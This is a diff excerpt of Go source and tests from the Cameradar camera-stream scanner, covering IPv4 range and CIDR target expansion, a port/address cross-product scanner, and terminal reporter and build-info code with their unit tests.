func parseOctetRange(value string) (octetRange, bool, error) {
|
||||
value = strings.TrimSpace(value)
|
||||
if value == "" {
|
||||
return octetRange{}, false, nil
|
||||
}
|
||||
|
||||
if strings.Contains(value, "-") {
|
||||
parts := strings.SplitN(value, "-", 2)
|
||||
if len(parts) != 2 {
|
||||
return octetRange{}, true, fmt.Errorf("invalid range %q", value)
|
||||
}
|
||||
|
||||
start, err := parseOctetValue(strings.TrimSpace(parts[0]))
|
||||
if err != nil {
|
||||
return octetRange{}, true, err
|
||||
}
|
||||
end, err := parseOctetValue(strings.TrimSpace(parts[1]))
|
||||
if err != nil {
|
||||
return octetRange{}, true, err
|
||||
}
|
||||
if start > end {
|
||||
return octetRange{}, true, fmt.Errorf("invalid range %q", value)
|
||||
}
|
||||
|
||||
return octetRange{start: start, end: end}, true, nil
|
||||
}
|
||||
|
||||
if !isDigits(value) {
|
||||
return octetRange{}, false, nil
|
||||
}
|
||||
|
||||
octet, err := parseOctetValue(value)
|
||||
if err != nil {
|
||||
return octetRange{}, true, err
|
||||
}
|
||||
|
||||
return octetRange{start: octet, end: octet}, true, nil
|
||||
}
|
||||
|
||||
// parseOctetValue parses a single IPv4 octet in [0, 255]; only unsigned
// decimal digit strings are accepted (no signs, no whitespace).
func parseOctetValue(value string) (int, error) {
	if value == "" {
		return 0, fmt.Errorf("invalid octet %q", value)
	}
	for _, r := range value {
		if r < '0' || r > '9' {
			return 0, fmt.Errorf("invalid octet %q", value)
		}
	}

	parsed, err := strconv.Atoi(value)
	if err != nil {
		// Reachable for digit strings that overflow int.
		return 0, fmt.Errorf("invalid octet %q", value)
	}
	if parsed < 0 || parsed > 255 {
		return 0, fmt.Errorf("octet %d out of range", parsed)
	}
	return parsed, nil
}
|
||||
|
||||
// isDigits reports whether value is non-empty and consists solely of ASCII
// decimal digits.
func isDigits(value string) bool {
	if value == "" {
		return false
	}
	// Byte-wise check is equivalent to a rune-wise one here: any byte of a
	// multi-byte UTF-8 sequence is >= 0x80 and therefore not in '0'..'9'.
	for i := 0; i < len(value); i++ {
		if value[i] < '0' || value[i] > '9' {
			return false
		}
	}
	return true
}
|
||||
@@ -0,0 +1,107 @@
|
||||
package skip_test
|
||||
|
||||
import (
|
||||
"net/netip"
|
||||
"strconv"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6/internal/scan/skip"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
// TestNew_ExpandsTargetsAndPorts verifies that CIDRs, single IPs, octet
// ranges, and port ranges are all expanded into the full cross product.
func TestNew_ExpandsTargetsAndPorts(t *testing.T) {
	targets := []string{
		"192.0.2.0/30",
		"192.0.2.15",
		"192.0.2.10-11",
	}
	ports := []string{"554", "8554-8555"}

	scanner := skip.New(targets, ports)

	streams, err := scanner.Scan(t.Context())
	require.NoError(t, err)

	addrs := []netip.Addr{
		netip.MustParseAddr("192.0.2.0"),
		netip.MustParseAddr("192.0.2.1"),
		netip.MustParseAddr("192.0.2.2"),
		netip.MustParseAddr("192.0.2.3"),
		netip.MustParseAddr("192.0.2.10"),
		netip.MustParseAddr("192.0.2.11"),
		netip.MustParseAddr("192.0.2.15"),
	}
	portsExpected := []uint16{554, 8554, 8555}

	// Build the expected cross product as comparable "addr:port" strings.
	var want []string
	for _, addr := range addrs {
		for _, port := range portsExpected {
			want = append(want, addr.String()+":"+strconv.Itoa(int(port)))
		}
	}

	var got []string
	for _, stream := range streams {
		got = append(got, stream.Address.String()+":"+strconv.Itoa(int(stream.Port)))
	}

	// Order is not asserted, only the set of pairs.
	assert.ElementsMatch(t, want, got)
}
|
||||
|
||||
// TestNew_ReturnsErrorOnInvalidPortRange verifies that an inverted port
// range (start > end) is rejected at scan time.
func TestNew_ReturnsErrorOnInvalidPortRange(t *testing.T) {
	scanner := skip.New([]string{"192.0.2.1"}, []string{"8555-8554"})

	_, err := scanner.Scan(t.Context())
	require.Error(t, err)
	assert.ErrorContains(t, err, "invalid port range")
}
|
||||
|
||||
// TestNew_ReturnsErrorOnEmptyTargets verifies that scanning with no targets
// fails rather than producing an empty stream list.
func TestNew_ReturnsErrorOnEmptyTargets(t *testing.T) {
	scanner := skip.New([]string{}, []string{"554"})

	_, err := scanner.Scan(t.Context())
	require.Error(t, err)
	assert.ErrorContains(t, err, "no valid target addresses resolved")
}
|
||||
|
||||
// TestNew_ResolvesServicePorts verifies that a well-known service name is
// resolved to its port number (relies on the host's services database).
func TestNew_ResolvesServicePorts(t *testing.T) {
	scanner := skip.New([]string{"127.0.0.1"}, []string{"http"})

	streams, err := scanner.Scan(t.Context())
	require.NoError(t, err)
	require.Len(t, streams, 1)

	assert.Equal(t, netip.MustParseAddr("127.0.0.1"), streams[0].Address)
	assert.Equal(t, uint16(80), streams[0].Port)
}
|
||||
|
||||
// TestNew_ReturnsErrorOnUnknownServicePort verifies that a token that is
// neither a number, a range, nor a known service name is rejected.
func TestNew_ReturnsErrorOnUnknownServicePort(t *testing.T) {
	scanner := skip.New([]string{"127.0.0.1"}, []string{"not-a-service"})

	_, err := scanner.Scan(t.Context())
	require.Error(t, err)
	assert.ErrorContains(t, err, "invalid port")
}
|
||||
|
||||
// TestNew_ResolvesHostnames verifies that a hostname target is resolved via
// DNS; only the first resolved address is asserted since resolver output
// order is environment-dependent.
func TestNew_ResolvesHostnames(t *testing.T) {
	scanner := skip.New([]string{"localhost"}, []string{"554"})

	streams, err := scanner.Scan(t.Context())
	require.NoError(t, err)
	require.NotEmpty(t, streams)
	addr := streams[0].Address
	assert.True(t,
		addr == netip.MustParseAddr("127.0.0.1") || addr == netip.MustParseAddr("::1"),
		"expected localhost to resolve to 127.0.0.1 or ::1, got %s",
		addr.String(),
	)
}
|
||||
|
||||
// TestNew_ReturnsErrorOnHostnameLookupFailure verifies that an unresolvable
// hostname (.invalid TLD is reserved to never resolve) surfaces as an error.
func TestNew_ReturnsErrorOnHostnameLookupFailure(t *testing.T) {
	scanner := skip.New([]string{"does-not-exist.invalid"}, []string{"554"})

	_, err := scanner.Scan(t.Context())
	require.Error(t, err)
	assert.ErrorContains(t, err, "resolving hostname")
}
|
||||
@@ -0,0 +1,139 @@
|
||||
package scan
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"math/bits"
|
||||
"net/netip"
|
||||
"strconv"
|
||||
"strings"
|
||||
)
|
||||
|
||||
func expandTargetsForScan(targets []string) ([]string, error) {
|
||||
expanded := make([]string, 0, len(targets))
|
||||
for _, target := range targets {
|
||||
value := strings.TrimSpace(target)
|
||||
if value == "" {
|
||||
continue
|
||||
}
|
||||
|
||||
addrs, ok, err := parseIPv4RangePair(value)
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
if ok {
|
||||
expanded = append(expanded, addrs...)
|
||||
continue
|
||||
}
|
||||
|
||||
expanded = append(expanded, value)
|
||||
}
|
||||
|
||||
return expanded, nil
|
||||
}
|
||||
|
||||
// Parse masscan range formats.
|
||||
func parseIPv4RangePair(target string) ([]string, bool, error) {
|
||||
parts := strings.SplitN(target, "-", 2)
|
||||
if len(parts) != 2 {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
startValue := strings.TrimSpace(parts[0])
|
||||
endValue := strings.TrimSpace(parts[1])
|
||||
if startValue == "" || endValue == "" {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
// Fall through if this is in nmap range format.
|
||||
if endIsOctet(endValue) {
|
||||
return nil, false, nil
|
||||
}
|
||||
|
||||
startAddr, startOK := parseIPv4Addr(startValue)
|
||||
endAddr, endOK := parseIPv4Addr(endValue)
|
||||
if !startOK && !endOK { // Allows the case where the target is just a hostname with a dash.
|
||||
return nil, false, nil
|
||||
}
|
||||
if !startOK || !endOK { // Prevents the case where one is an address and the other part is not.
|
||||
return nil, false, fmt.Errorf("invalid range %q", target)
|
||||
}
|
||||
|
||||
startAddr = startAddr.Unmap()
|
||||
endAddr = endAddr.Unmap()
|
||||
if !startAddr.Is4() || !endAddr.Is4() {
|
||||
return nil, true, fmt.Errorf("invalid range %q", target)
|
||||
}
|
||||
|
||||
start := ipv4ToUint32(startAddr)
|
||||
end := ipv4ToUint32(endAddr)
|
||||
if start > end {
|
||||
return nil, true, fmt.Errorf("invalid range %q", target)
|
||||
}
|
||||
|
||||
return expandIPv4RangeToTargets(start, end), true, nil
|
||||
}
|
||||
|
||||
func parseIPv4Addr(value string) (netip.Addr, bool) {
|
||||
addr, err := netip.ParseAddr(value)
|
||||
if err != nil {
|
||||
return netip.Addr{}, false
|
||||
}
|
||||
return addr, true
|
||||
}
|
||||
|
||||
// endIsOctet reports whether value (after trimming) is a bare integer in
// [0, 255] — i.e. the right-hand side of an nmap-style octet range rather
// than a full address.
func endIsOctet(value string) bool {
	parsed, err := strconv.Atoi(strings.TrimSpace(value))
	return err == nil && parsed >= 0 && parsed <= 255
}
|
||||
|
||||
// expandIPv4RangeToTargets covers the inclusive address range [start, end]
// with a minimal list of CIDR blocks; single addresses are emitted bare,
// without a "/32" suffix.
//
// Greedy algorithm: at each step, emit the largest power-of-two block that
// both starts aligned at the current address and fits in the remaining
// count, then advance past it.
func expandIPv4RangeToTargets(start, end uint32) []string {
	if start > end {
		return nil
	}

	const maxUint32 = uint64(^uint32(0))
	// Count and cursor use uint64 so a full-range request cannot overflow.
	remaining := uint64(end) - uint64(start) + 1
	results := make([]string, 0, 16)

	for current := uint64(start); remaining > 0; {
		if current > maxUint32 {
			// Walked past 255.255.255.255; nothing left to emit.
			return results
		}

		current32 := uint32(current)
		// Largest block permitted by the current address's alignment.
		// (TrailingZeros32(0) is 32, allowing the full 2^32 block at 0.0.0.0.)
		maxSize := uint64(1) << bits.TrailingZeros32(current32)
		// Shrink until the block also fits in the remaining count.
		for maxSize > remaining {
			maxSize >>= 1
		}

		// maxSize == 2^(32-prefixLen).
		prefixLen := 32 - (bits.Len64(maxSize) - 1)
		addr := uint32ToIPv4(current32)
		if maxSize == 1 {
			results = append(results, addr.String())
		} else {
			results = append(results, fmt.Sprintf("%s/%d", addr.String(), prefixLen))
		}

		current += maxSize
		remaining -= maxSize
	}

	return results
}
|
||||
|
||||
func ipv4ToUint32(addr netip.Addr) uint32 {
|
||||
value := addr.As4()
|
||||
return uint32(value[0])<<24 | uint32(value[1])<<16 | uint32(value[2])<<8 | uint32(value[3])
|
||||
}
|
||||
|
||||
func uint32ToIPv4(value uint32) netip.Addr {
|
||||
return netip.AddrFrom4([4]byte{
|
||||
byte(value >> 24),
|
||||
byte(value >> 16),
|
||||
byte(value >> 8),
|
||||
byte(value),
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,73 @@
|
||||
package scan
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
// TestExpandTargetsForScan_ExpandsFullIPv4Range verifies that only
// masscan-style full-address ranges are rewritten (into a minimal CIDR
// cover) while nmap-style ranges, CIDRs, hostnames pass through and blank
// tokens are dropped.
func TestExpandTargetsForScan_ExpandsFullIPv4Range(t *testing.T) {
	targets := []string{
		"192.0.2.10-192.0.2.12",
		"192.168.1.140-255",
		"192.0.2.0/30",
		"localhost",
		"",
	}

	got, err := expandTargetsForScan(targets)
	require.NoError(t, err)

	// .10-.12 covers as the aligned /31 {.10,.11} plus the single .12.
	assert.ElementsMatch(t, []string{
		"192.0.2.10/31",
		"192.0.2.12",
		"192.168.1.140-255",
		"192.0.2.0/30",
		"localhost",
	}, got)
}
||||
|
||||
// TestExpandTargetsForScan_ReturnsErrorOnInvalidRange covers the malformed
// and ambiguous dash cases: inverted/mixed ranges must error, while
// dash-containing hostnames and nmap-style ranges pass through verbatim.
func TestExpandTargetsForScan_ReturnsErrorOnInvalidRange(t *testing.T) {
	t.Run("inverted range", func(t *testing.T) {
		_, err := expandTargetsForScan([]string{"192.0.2.12-192.0.2.10"})
		require.Error(t, err)
		assert.ErrorContains(t, err, "invalid range")
	})

	t.Run("invalid range", func(t *testing.T) {
		_, err := expandTargetsForScan([]string{"192.0.2.12-foo"})
		require.Error(t, err)
		assert.ErrorContains(t, err, "invalid range")
	})

	t.Run("hostname with dash", func(t *testing.T) {
		tgts, err := expandTargetsForScan([]string{"my-host.com"})
		require.NoError(t, err)
		assert.Equal(t, []string{"my-host.com"}, tgts)
	})

	t.Run("ends with dash", func(t *testing.T) {
		tgts, err := expandTargetsForScan([]string{"a-"})
		require.NoError(t, err)
		assert.Equal(t, []string{"a-"}, tgts)
	})

	t.Run("starts with dash", func(t *testing.T) {
		tgts, err := expandTargetsForScan([]string{"-a"})
		require.NoError(t, err)
		assert.Equal(t, []string{"-a"}, tgts)
	})

	t.Run("only a dash", func(t *testing.T) {
		tgts, err := expandTargetsForScan([]string{"-"})
		require.NoError(t, err)
		assert.Equal(t, []string{"-"}, tgts)
	})

	t.Run("nmap format", func(t *testing.T) {
		tgts, err := expandTargetsForScan([]string{"192.168.1.10-255"})
		require.NoError(t, err)
		assert.Equal(t, []string{"192.168.1.10-255"}, tgts)
	})
}
|
||||
@@ -0,0 +1,48 @@
|
||||
package ui
|
||||
|
||||
import "strings"
|
||||
|
||||
// BuildInfo represents build metadata injected at link time.
type BuildInfo struct {
	Version string // semantic version, with or without a leading "v"; empty means dev build
	Commit  string // VCS commit hash; may be "none"/"unknown" when unavailable
	Date    string // build timestamp as injected by the build system
}
|
||||
|
||||
// DisplayVersion returns the version prefixed with "v" when needed.
|
||||
func (b BuildInfo) DisplayVersion() string {
|
||||
version := strings.TrimSpace(b.Version)
|
||||
if version == "" {
|
||||
version = "dev"
|
||||
}
|
||||
if strings.HasPrefix(version, "v") {
|
||||
return version
|
||||
}
|
||||
return "v" + version
|
||||
}
|
||||
|
||||
// LogVersion returns the version without a leading "v".
|
||||
func (b BuildInfo) LogVersion() string {
|
||||
version := strings.TrimSpace(b.Version)
|
||||
if version == "" {
|
||||
return "dev"
|
||||
}
|
||||
return strings.TrimPrefix(version, "v")
|
||||
}
|
||||
|
||||
// ShortCommit returns a shortened commit hash suitable for display.
|
||||
func (b BuildInfo) ShortCommit() string {
|
||||
commit := strings.TrimSpace(b.Commit)
|
||||
if commit == "" || commit == "none" || commit == "unknown" {
|
||||
return "unknown"
|
||||
}
|
||||
if len(commit) > 7 {
|
||||
return commit[:7]
|
||||
}
|
||||
return commit
|
||||
}
|
||||
|
||||
// TUIHeader returns the header used by the TUI.
// It combines DisplayVersion ("vX.Y.Z") and ShortCommit into one line.
func (b BuildInfo) TUIHeader() string {
	return "Cameradar — " + b.DisplayVersion() + " (" + b.ShortCommit() + ")"
}
|
||||
@@ -0,0 +1,175 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
// TestBuildInfo_DisplayVersion covers prefixing, trimming, and the "dev"
// fallback of DisplayVersion.
func TestBuildInfo_DisplayVersion(t *testing.T) {
	tests := []struct {
		name    string
		version string
		want    string
	}{
		{
			name:    "empty defaults to dev with prefix",
			version: "",
			want:    "vdev",
		},
		{
			name:    "dev without prefix",
			version: "dev",
			want:    "vdev",
		},
		{
			name:    "already prefixed",
			version: "v1.2.3",
			want:    "v1.2.3",
		},
		{
			name:    "adds prefix",
			version: "1.2.3",
			want:    "v1.2.3",
		},
		{
			name:    "trims spaces with prefix",
			version: " v2.0 ",
			want:    "v2.0",
		},
		{
			name:    "trims spaces without prefix",
			version: " 2.0 ",
			want:    "v2.0",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			info := ui.BuildInfo{Version: test.version}
			assert.Equal(t, test.want, info.DisplayVersion())
		})
	}
}
|
||||
|
||||
// TestBuildInfo_LogVersion covers prefix stripping (first "v" only),
// trimming, and the "dev" fallback of LogVersion.
func TestBuildInfo_LogVersion(t *testing.T) {
	tests := []struct {
		name    string
		version string
		want    string
	}{
		{
			name:    "empty defaults to dev",
			version: "",
			want:    "dev",
		},
		{
			name:    "removes leading v",
			version: "v1.2.3",
			want:    "1.2.3",
		},
		{
			name:    "keeps version without prefix",
			version: "1.2.3",
			want:    "1.2.3",
		},
		{
			name:    "trims spaces and removes prefix",
			version: " v2.0 ",
			want:    "2.0",
		},
		{
			name:    "removes only first prefix",
			version: "vv1",
			want:    "v1",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			info := ui.BuildInfo{Version: test.version}
			assert.Equal(t, test.want, info.LogVersion())
		})
	}
}
|
||||
|
||||
// TestBuildInfo_ShortCommit covers the "unknown" sentinel values,
// seven-character truncation, and trimming of ShortCommit.
func TestBuildInfo_ShortCommit(t *testing.T) {
	tests := []struct {
		name   string
		commit string
		want   string
	}{
		{
			name:   "empty defaults to unknown",
			commit: "",
			want:   "unknown",
		},
		{
			name:   "none defaults to unknown",
			commit: "none",
			want:   "unknown",
		},
		{
			name:   "unknown defaults to unknown",
			commit: "unknown",
			want:   "unknown",
		},
		{
			name:   "short commit preserved",
			commit: "abcdef",
			want:   "abcdef",
		},
		{
			name:   "seven chars preserved",
			commit: "abcdefg",
			want:   "abcdefg",
		},
		{
			name:   "long commit shortened",
			commit: "abcdefghi",
			want:   "abcdefg",
		},
		{
			name:   "trims spaces before shortening",
			commit: " 1234567890 ",
			want:   "1234567",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			info := ui.BuildInfo{Commit: test.commit}
			assert.Equal(t, test.want, info.ShortCommit())
		})
	}
}
|
||||
|
||||
// TestBuildInfo_TUIHeader verifies the header combines DisplayVersion and
// ShortCommit, including their fallback values.
func TestBuildInfo_TUIHeader(t *testing.T) {
	tests := []struct {
		name    string
		version string
		commit  string
		want    string
	}{
		{
			name:    "uses display version and short commit",
			version: "1.2.3",
			commit:  "abcdefghi",
			want:    "Cameradar — v1.2.3 (abcdefg)",
		},
		{
			name:    "uses defaults for empty values",
			version: "",
			commit:  "",
			want:    "Cameradar — vdev (unknown)",
		},
	}

	for _, test := range tests {
		t.Run(test.name, func(t *testing.T) {
			info := ui.BuildInfo{Version: test.version, Commit: test.commit}
			assert.Equal(t, test.want, info.TUIHeader())
		})
	}
}
|
||||
@@ -0,0 +1,29 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// NopReporter discards all UI events. Useful as a default reporter when no
// UI front end is attached.
type NopReporter struct{}

// Start implements Reporter.
func (NopReporter) Start(cameradar.Step, string) {}

// Done implements Reporter.
func (NopReporter) Done(cameradar.Step, string) {}

// Progress implements Reporter.
func (NopReporter) Progress(cameradar.Step, string) {}

// Debug implements Reporter.
func (NopReporter) Debug(cameradar.Step, string) {}

// Error implements Reporter.
func (NopReporter) Error(cameradar.Step, error) {}

// Summary implements Reporter.
func (NopReporter) Summary([]cameradar.Stream, error) {}

// Close implements Reporter.
func (NopReporter) Close() {}
|
||||
@@ -0,0 +1,104 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"io"
|
||||
"time"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// PlainReporter renders a line-oriented UI for non-interactive terminals.
|
||||
type PlainReporter struct {
|
||||
out io.Writer
|
||||
debug bool
|
||||
}
|
||||
|
||||
// NewPlainReporter creates a line-oriented reporter.
|
||||
func NewPlainReporter(out io.Writer, debug bool) *PlainReporter {
|
||||
return &PlainReporter{
|
||||
out: out,
|
||||
debug: debug,
|
||||
}
|
||||
}
|
||||
|
||||
// PrintStartup prints build metadata and configuration options.
|
||||
func (r *PlainReporter) PrintStartup(buildInfo BuildInfo, options []string) {
|
||||
step := cameradar.Step("Startup")
|
||||
message := fmt.Sprintf("Running cameradar version %s, commit %s", buildInfo.LogVersion(), buildInfo.ShortCommit())
|
||||
r.print(step, "INFO", message)
|
||||
if len(options) == 0 {
|
||||
return
|
||||
}
|
||||
for _, option := range options {
|
||||
r.print(step, "INFO", option)
|
||||
}
|
||||
}
|
||||
|
||||
// Start prints the beginning of a step.
|
||||
func (r *PlainReporter) Start(step cameradar.Step, message string) {
|
||||
r.print(step, "STEP", message)
|
||||
}
|
||||
|
||||
// Done prints the completion of a step.
|
||||
func (r *PlainReporter) Done(step cameradar.Step, message string) {
|
||||
r.print(step, "DONE", message)
|
||||
}
|
||||
|
||||
// Progress prints a progress message.
|
||||
func (r *PlainReporter) Progress(step cameradar.Step, message string) {
|
||||
if _, _, ok := cameradar.ParseProgressMessage(message); ok {
|
||||
return
|
||||
}
|
||||
r.print(step, "INFO", message)
|
||||
}
|
||||
|
||||
// Debug prints a debug message when debug mode is enabled.
|
||||
func (r *PlainReporter) Debug(step cameradar.Step, message string) {
|
||||
if !r.debug {
|
||||
return
|
||||
}
|
||||
r.print(step, "DBUG", message)
|
||||
}
|
||||
|
||||
// Error prints an error message.
|
||||
func (r *PlainReporter) Error(step cameradar.Step, err error) {
|
||||
if err == nil {
|
||||
return
|
||||
}
|
||||
r.print(step, "EROR", err.Error())
|
||||
}
|
||||
|
||||
// Summary prints the final summary.
|
||||
func (r *PlainReporter) Summary(streams []cameradar.Stream, err error) {
|
||||
_, _ = fmt.Fprintln(r.out, "Summary")
|
||||
_, _ = fmt.Fprintln(r.out, "-------")
|
||||
_, _ = fmt.Fprintln(r.out, FormatSummary(streams, err))
|
||||
}
|
||||
|
||||
// Close is a no-op for the plain reporter.
|
||||
func (r *PlainReporter) Close() {}
|
||||
|
||||
func (r *PlainReporter) print(step cameradar.Step, level, message string) {
|
||||
if message == "" {
|
||||
return
|
||||
}
|
||||
|
||||
level = normalizeLevel(level)
|
||||
_, _ = fmt.Fprintf(r.out, "%s [%s] %s: %s\n", time.Now().Format(time.RFC3339), level, cameradar.StepLabel(step), message)
|
||||
}
|
||||
|
||||
// normalizeLevel maps a log level name onto the fixed four-character form
// used by the plain reporter: known names get canonical abbreviations,
// longer names are truncated, shorter ones right-padded with spaces.
func normalizeLevel(level string) string {
	switch level {
	case "DEBUG":
		return "DBUG"
	case "ERROR":
		return "EROR"
	case "START", "STEP":
		return "STEP"
	default:
		if len(level) > 4 {
			return level[:4]
		}
		return fmt.Sprintf("%-4s", level)
	}
}
|
||||
@@ -0,0 +1,75 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"errors"
|
||||
"strings"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
)
|
||||
|
||||
func TestPlainReporter_Outputs(t *testing.T) {
|
||||
t.Run("prints events", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, true)
|
||||
|
||||
reporter.Start(cameradar.StepScan, "starting")
|
||||
reporter.Progress(cameradar.StepScan, "working")
|
||||
reporter.Debug(cameradar.StepScan, "details")
|
||||
reporter.Done(cameradar.StepScan, "finished")
|
||||
reporter.Error(cameradar.StepScan, errors.New("boom"))
|
||||
reporter.Summary([]cameradar.Stream{}, nil)
|
||||
|
||||
content := out.String()
|
||||
assert.Contains(t, content, " [STEP] Scan targets: starting")
|
||||
assert.Contains(t, content, " [INFO] Scan targets: working")
|
||||
assert.Contains(t, content, " [DBUG] Scan targets: details")
|
||||
assert.Contains(t, content, " [DONE] Scan targets: finished")
|
||||
assert.Contains(t, content, " [EROR] Scan targets: boom")
|
||||
assert.Contains(t, content, "Summary\n-------\nAccessible streams: 0")
|
||||
})
|
||||
|
||||
t.Run("respects debug flag and empty input", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, false)
|
||||
|
||||
reporter.Debug(cameradar.StepScan, "hidden")
|
||||
reporter.Progress(cameradar.StepScan, "")
|
||||
reporter.Error(cameradar.StepScan, nil)
|
||||
|
||||
content := out.String()
|
||||
assert.NotContains(t, content, "DBUG")
|
||||
assert.Equal(t, "", strings.TrimSpace(content))
|
||||
})
|
||||
}
|
||||
|
||||
func TestPlainReporter_PrintStartup(t *testing.T) {
|
||||
t.Run("prints build info and options", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, false)
|
||||
|
||||
reporter.PrintStartup(ui.BuildInfo{Version: "v1.2.3", Commit: "abcdefghi"}, []string{
|
||||
"targets: 127.0.0.1",
|
||||
"ports: 554",
|
||||
})
|
||||
|
||||
content := out.String()
|
||||
assert.Contains(t, content, " [INFO] Startup: Running cameradar version 1.2.3, commit abcdefg")
|
||||
assert.Contains(t, content, " [INFO] Startup: targets: 127.0.0.1")
|
||||
assert.Contains(t, content, " [INFO] Startup: ports: 554")
|
||||
})
|
||||
|
||||
t.Run("prints only build info when options empty", func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
reporter := ui.NewPlainReporter(out, false)
|
||||
|
||||
reporter.PrintStartup(ui.BuildInfo{Version: "", Commit: "none"}, nil)
|
||||
|
||||
content := out.String()
|
||||
assert.Contains(t, content, " [INFO] Startup: Running cameradar version dev, commit unknown")
|
||||
assert.Equal(t, 1, strings.Count(content, " Startup: "))
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,45 @@
|
||||
package ui
|
||||
|
||||
import (
|
||||
"context"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
)
|
||||
|
||||
// Reporter defines the interface for cameradar UIs.
|
||||
type Reporter interface {
|
||||
Start(step cameradar.Step, message string)
|
||||
Done(step cameradar.Step, message string)
|
||||
Progress(step cameradar.Step, message string)
|
||||
Debug(step cameradar.Step, message string)
|
||||
Error(step cameradar.Step, err error)
|
||||
Summary(streams []cameradar.Stream, err error)
|
||||
Close()
|
||||
}
|
||||
|
||||
// NewReporter creates a Reporter based on the requested mode.
|
||||
func NewReporter(mode cameradar.Mode, debug bool, out io.Writer, interactive bool, buildInfo BuildInfo, cancel context.CancelFunc) (Reporter, error) {
|
||||
if debug {
|
||||
return NewPlainReporter(out, debug), nil
|
||||
}
|
||||
|
||||
switch mode {
|
||||
case cameradar.ModePlain:
|
||||
return NewPlainReporter(out, debug), nil
|
||||
case cameradar.ModeTUI:
|
||||
if !interactive {
|
||||
return nil, errors.New("tui mode requires an interactive terminal")
|
||||
}
|
||||
return NewTUIReporter(debug, out, buildInfo, cancel)
|
||||
case cameradar.ModeAuto:
|
||||
if interactive {
|
||||
return NewTUIReporter(debug, out, buildInfo, cancel)
|
||||
}
|
||||
return NewPlainReporter(out, debug), nil
|
||||
default:
|
||||
return nil, fmt.Errorf("unsupported ui mode %q", mode)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,94 @@
|
||||
package ui_test
|
||||
|
||||
import (
|
||||
"bytes"
|
||||
"testing"
|
||||
|
||||
"github.com/Ullaakut/cameradar/v6"
|
||||
"github.com/Ullaakut/cameradar/v6/internal/ui"
|
||||
"github.com/stretchr/testify/assert"
|
||||
"github.com/stretchr/testify/require"
|
||||
)
|
||||
|
||||
func TestNewReporter(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
mode cameradar.Mode
|
||||
interactive bool
|
||||
wantType string
|
||||
wantErrContains string
|
||||
}{
|
||||
{
|
||||
name: "plain",
|
||||
mode: cameradar.ModePlain,
|
||||
interactive: false,
|
||||
wantType: "plain",
|
||||
},
|
||||
{
|
||||
name: "auto non-interactive",
|
||||
mode: cameradar.ModeAuto,
|
||||
interactive: false,
|
||||
wantType: "plain",
|
||||
},
|
||||
{
|
||||
name: "tui non-interactive",
|
||||
mode: cameradar.ModeTUI,
|
||||
interactive: false,
|
||||
wantErrContains: "interactive terminal",
|
||||
},
|
||||
{
|
||||
name: "unsupported",
|
||||
mode: cameradar.Mode("unknown"),
|
||||
interactive: false,
|
||||
wantErrContains: "unsupported ui mode",
|
||||
},
|
||||
{
|
||||
name: "auto interactive",
|
||||
mode: cameradar.ModeAuto,
|
||||
interactive: true,
|
||||
wantType: "tui",
|
||||
},
|
||||
}
|
||||
|
||||
for _, test := range tests {
|
||||
t.Run(test.name, func(t *testing.T) {
|
||||
out := &bytes.Buffer{}
|
||||
|
||||
reporter, err := ui.NewReporter(test.mode, false, out, test.interactive, ui.BuildInfo{Version: "dev", Commit: "none"}, func() {})
|
||||
|
||||
if test.wantErrContains != "" {
|
||||
require.Error(t, err)
|
||||
assert.ErrorContains(t, err, test.wantErrContains)
|
||||
assert.Nil(t, reporter)
|
||||
return
|
||||
}
|
||||
|
||||
require.NoError(t, err)
|
||||
require.NotNil(t, reporter)
|
||||
|
||||
switch test.wantType {
|
||||
case "plain":
|
||||
_, ok := reporter.(*ui.PlainReporter)
|
||||
assert.True(t, ok)
|
||||
case "tui":
|
||||
_, ok := reporter.(*ui.TUIReporter)
|
||||
assert.True(t, ok)
|
||||
}
|
||||
|
||||
reporter.Close()
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestNopReporter_DoesNotPanic(t *testing.T) {
|
||||
reporter := ui.NopReporter{}
|
||||
assert.NotPanics(t, func() {
|
||||
reporter.Start(cameradar.StepScan, "start")
|
||||
reporter.Done(cameradar.StepScan, "done")
|
||||
reporter.Progress(cameradar.StepScan, "progress")
|
||||
reporter.Debug(cameradar.StepScan, "debug")
|
||||
reporter.Error(cameradar.StepScan, assert.AnError)
|
||||
reporter.Summary(nil, nil)
|
||||
reporter.Close()
|
||||
})
|
||||
}
|
||||
@@ -0,0 +1,283 @@
|
||||
package ui
|
||||
|
||||
